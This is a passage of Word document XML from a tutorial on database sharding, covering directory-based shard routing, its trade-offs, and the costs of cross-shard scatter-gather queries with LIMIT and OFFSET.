    <w:p w14:paraId="4FE28555" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  Directory returns: shard_id=3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4021EEB0" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  Application connects to Shard 3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70CEA37C" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4262CC2D" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  Directory is typically cached in application tier (TTL = minutes)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="633FA533" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  Most lookups served from local cache (directory queries rare)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BB180FA" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Directory-based advantages:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03ADBC6F" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B2297FC" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>Maximum flexibility:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="392D7816" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  Any mapping is possible — no constraint from hash function</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2064C028" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  Individual keys can be relocated without changing routing rules</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="542C820A" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  (just update the directory entry)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A85ACB9" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05400F0D" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  Supports heterogeneous shards:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="058E1109" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">    Large tenants → dedicated shard</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3630394C" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">    Small tenants → shared shard (multiple tenants, one shard)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7312E6D5" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">    This is the "per-tenant isolation" model used by Salesforce, Shopify, etc.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="372E6B7F" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0ADEB331" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:lastRenderedPageBreak/>
        <w:t>Gradual rebalancing:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C8D204A" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  Move a specific tenant to a new shard:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D1C8747" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">    1. Migrate tenant's data to new shard (background)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A7EAB2C" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">    2. Update directory: tenant → new_shard_id</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6879A4E7" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">    3. Done — no other tenants affected</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DB81DBE" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B59C41C" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  No bulk migration required (unlike hash resharding)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DC547F3" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Directory-based disadvantages:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1466370E" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="305ADEA4" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>Directory is a critical dependency:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="291C0927" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  Every query requires directory lookup</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3397F343" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  If directory is unavailable: routing fails → all queries fail</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="675C1FDD" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  Must be highly available (Redis Cluster, multi-AZ, replicated)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="543F48E9" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  Must be fast (milliseconds or directory caching required)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1ADCF481" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="299CB4E2" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>Directory cache consistency:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BD40888" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  Application caches directory entries locally</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10583FB9" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  If shard migration occurs: cached entries stale → routing to wrong shard</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2491487E" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  Invalidation required: either short TTL (frequent re-queries) </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7496CAA9" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">                         or pub/sub invalidation on update</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57E99AC5" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">                         </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37E36EA1" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  During migration: requests may arrive at old shard</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B17E205" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  Old shard must: redirect to new shard, or buffer until directory updated</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E4690E3" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="043141B7" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>Operational complexity:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70B2B682" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  Manual directory management for tenant-based sharding</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13109FCD" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">  Must handle: tenant creation (assign shard), tenant deletion (release shard),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FCF37A3" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">               tenant growth (migrate to larger shard), shard decommission</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B9662F2" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:pict w14:anchorId="6ADCB041">
          <v:rect id="_x0000_i5856" style="width:0;height:3pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="635ECC22" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00875520">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3. Cross-Shard Queries — The Distributed Query Problem</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46CA159C" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00875520">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The Scatter-Gather Pattern</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51ABD2AB" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>The most expensive cross-shard operation: broadcast a query to all shards, collect results, merge at the application or proxy layer.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47BDD186" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="581BCEA1" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>Query: SELECT * FROM users WHERE signup_date &gt; '2024-01-01' LIMIT 100</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DD2E53C" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>Partition key: user_id (hash-based, no correlation with signup_date)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EB0F41B" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520"/>
    <w:p w14:paraId="45918A52" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>Scatter phase:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B7455CF" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  Router sends query to all N shards in parallel:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="390CE73A" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">    SELECT * FROM users WHERE signup_date &gt; '2024-01-01' LIMIT 100</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F0F6DD1" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">    (sent to Shard 1, Shard 2, ..., Shard N simultaneously)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DF4CB48" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="432779A0" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  Each shard executes independently, returns up to 100 results</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C71BB40" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12297512" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>Gather phase:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B7CFFD1" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  Router receives results from all shards (N × 100 rows, up to)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="656ECB51" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  Merge: combine all results into one sorted list</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="667ACCD2" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  Apply global LIMIT: take first 100 from merged results</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="101091CC" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  Return to client</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66B5FC19" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E9545BD" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>Cost analysis:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FA14AC2" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  Network: N round trips (parallel, so 1 RTT latency but N × bandwidth)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19BDF249" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">  Database work: each shard does full work for the query</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27048D19" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">    Total database work: N × single-shard work (no benefit from sharding for this query)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74A5C2DC" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  Merge work: application merges N × 100 rows</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16315667" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  Result: overall latency similar to single shard, but N× more total database work</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DCC7738" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28069C53" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>At N=100 shards: scatter-gather is catastrophic for high-frequency queries</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20A7F518" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>→ Design partition key to avoid scatter-gather for common query patterns</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6672647F" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>→ Accept scatter-gather only for rare, low-frequency analytical queries</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D86409D" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The LIMIT problem in scatter-gather:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3269B721" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CA33CA4" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>Query: SELECT * FROM products ORDER BY popularity DESC LIMIT 10</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D5A1647" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520"/>
    <w:p w14:paraId="44156C32" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>Naive scatter-gather:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04E4A22B" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  Send to all shards: SELECT * FROM products ORDER BY popularity DESC LIMIT 10</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="522E0397" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  Each shard returns its top 10 (total: N × 10 results)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A4CABFE" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  Application merges, takes global top 10</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A6F1DF0" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13DC8B42" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  Problem: works correctly. But:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0ED71B40" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">    Each shard does a full sort of its data (or uses an index)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D3D2988" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">    Application receives N × 10 rows, sorts them, discards N × 10 - 10</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E6F4AF4" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">    For N=100: application receives 1,000 rows to return 10</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E9B58EA" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58AF06E3" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>Pushdown optimization:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DA8124C" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  The LIMIT can be pushed down to shards: each shard returns K rows (K &gt; 10)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43D2D3A9" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  Application collects N × K, merges, returns 10</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A0EE35F" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78357957" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">  For ORDER BY without WHERE: K = LIMIT (each shard's top K is sufficient)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="367D09E6" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  For ORDER BY with WHERE: may need K = full count if WHERE is selective</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75F189CE" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520"/>
    <w:p w14:paraId="4E408817" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>Deep pagination (OFFSET):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CB1B5B2" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  SELECT * FROM products ORDER BY popularity DESC LIMIT 10 OFFSET 990</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6894313F" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="183237F3" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  Naive: each shard returns LIMIT 10 OFFSET 990 → 10 rows each</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="599914A1" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
